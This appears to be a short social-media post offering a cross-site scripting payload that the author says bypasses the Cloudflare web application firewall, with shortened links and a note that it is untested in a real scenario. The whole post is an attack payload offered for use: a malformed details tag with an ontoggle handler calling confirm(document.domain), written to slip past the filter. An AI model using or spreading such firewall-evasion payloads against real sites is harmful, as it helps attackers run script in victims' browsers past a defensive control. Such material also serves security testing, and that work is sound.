If you need a CloudFlare WAF bypass for an XSS, I have that one that works on https://t.co/YkMsi9JF1l (not tested it in a real scenario)

Payload: <details+/’on+/ontoggle=1^confirm(document.domain)+open//

Link: https://t.co/tMV6imAaji https://t.co/uNa5rpExOQ